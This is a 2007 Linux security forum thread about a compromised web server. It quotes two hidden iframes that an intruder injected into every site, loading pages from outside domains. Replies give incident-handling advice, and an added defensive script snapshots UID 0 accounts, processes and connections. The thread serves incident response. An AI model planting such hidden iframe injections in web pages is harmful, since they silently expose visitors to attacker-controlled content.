LinuxQuestions.org
Linux - Security This forum is for all security related questions.
Questions, tips, system compromises, firewalls, etc. are all included here.

Old 04-04-2007, 04:06 AM   #1
oknow
LQ Newbie
 
Registered: Apr 2007
Posts: 2

Rep: Reputation: 0
Server Hacked..pls help


I have got an email from cPanel saying mysql and mailman have uid0 accounts, which should be compromised. And the guy who hacked my server also put iframes on each of my sites.
Here's the code:
Code:
<IFRAME name="StatPage" src="http://stelaartois.ru/index2.php" width=5 height=5 style="display:none"></IFRAME>

<iframe name="counter" src="http://mystabcounter.info/index2.php" height="16" width="16" frameborder="0" scrolling="no"></iframe>
Now, does anybody know how to get rid of this code with perl?
I just know the following code to remove the strings:
Code:
find . -type f -name '*' -print0 | xargs -0 perl -pi -e 's/old string/new string/g'
But it seems useless to get rid of the long codes such as iframes listed above.

Thanks for your ideas, please help out!
 
Old 04-04-2007, 05:31 AM   #2
phantom_cyph
Senior Member
 
Registered: Feb 2007
Location: The Tropics
Distribution: Slackware & Derivatives
Posts: 2,472
Blog Entries: 1

Rep: Reputation: 128
I think the term would be 'cracked'. Try this post here. Don't be afraid of the name, they are very helpful.
 
Old 04-04-2007, 06:51 AM   #3
Hangdog42
LQ Veteran
 
Registered: Feb 2003
Location: Maryland
Distribution: Slackware
Posts: 7,803
Blog Entries: 1

Rep: Reputation: 422
Personally, I think you need to unplug the machine from the network and start digging into how your machine was compromised. The CERT Intruder Checklist is a good place to start. You probably also want to check into running rkhunter and chkrootkit.
Quote:
Now, does anybody know how to get rid of this code with perl?
Just getting rid of the code is not the problem here. If you've been compromised, you've got much bigger problems than just some extraneous iframes in your site. You need to find out how they got in and remedy the situation. Also posting details like distro, the level of control you have (is it your machine or someone else's) would be helpful. Also details around any security measures you had in place.
 
Old 04-04-2007, 04:04 PM   #4
unSpawn
Moderator
 
Registered: May 2001
Posts: 29,415
Blog Entries: 55

Rep: Reputation: 3600
Quote:
Originally Posted by kalabanta
Try this post here.
(OT, but since I'm a moderator I'm allowed to do so) Members who frequent LQSEC have done incident handling for the past years in a dedicated, decisive and successful way. If members don't react within, say, twenty-four hours then, and only if you aren't capable of doing incident handling yourself, you've got a case for redirecting off-site. In all other cases I'd rather you didn't.


@oknow: Hangdog42 is on the right track: 1) mitigate the situation by isolating the box (stop services and restrict access to your IP or range if it is a colo box), 2) investigate (take snapshots of users, running processes, network connections and open files before killing anything) and please try to be as verbose as you can when reporting.
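
The snapshot step described in the post above, together with a check for the extra UID 0 accounts mentioned in the first post, as an added example that is not part of the original thread. The function names, output file names and the choice of tools (who, last, ps, netstat, lsof) are assumptions of this example.

```shell
#!/bin/sh
# Added example: record volatile state BEFORE stopping services or killing
# processes. Function and file names are assumptions made for illustration.

# Print every account whose UID field is 0 in a passwd-format file.
# On a healthy system this normally prints only "root".
uid0_accounts() {
    awk -F: '$3 == 0 { print $1 }' "${1:-/etc/passwd}"
}

# Run one command and save stdout+stderr to <outdir>/<name>.txt.
# A missing tool or a non-zero exit is recorded instead of aborting the run.
capture() {
    outdir=$1; name=$2; shift 2
    if command -v "$1" >/dev/null 2>&1; then
        "$@" >"$outdir/$name.txt" 2>&1 || echo "exit status $?" >>"$outdir/$name.txt"
    else
        echo "tool not available: $1" >"$outdir/$name.txt"
    fi
}

# Take the snapshot: users, running processes, network connections, open files.
snapshot_state() {
    outdir=$1
    mkdir -p "$outdir" || return 1
    chmod 700 "$outdir"
    date -u +%Y-%m-%dT%H:%M:%SZ >"$outdir/taken_at.txt"
    uid0_accounts /etc/passwd >"$outdir/uid0_accounts.txt"
    capture "$outdir" users_logged_in who -a
    capture "$outdir" login_history last -n 50
    capture "$outdir" processes ps auxww
    capture "$outdir" network netstat -anp
    capture "$outdir" open_files lsof -n -P
    # Hash the captures so later changes to the files are detectable.
    if command -v sha256sum >/dev/null 2>&1; then
        sha256sum "$outdir"/*.txt >"$outdir/MANIFEST.sha256"
    fi
}
```

Run it as root with a target directory, for example `snapshot_state /root/ir-snapshot`, and copy the result off the box. On a compromised machine the local binaries may themselves have been replaced, so treat the output as a starting point for the investigation.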
 
  


All times are GMT -5. The time now is 07:44 AM.
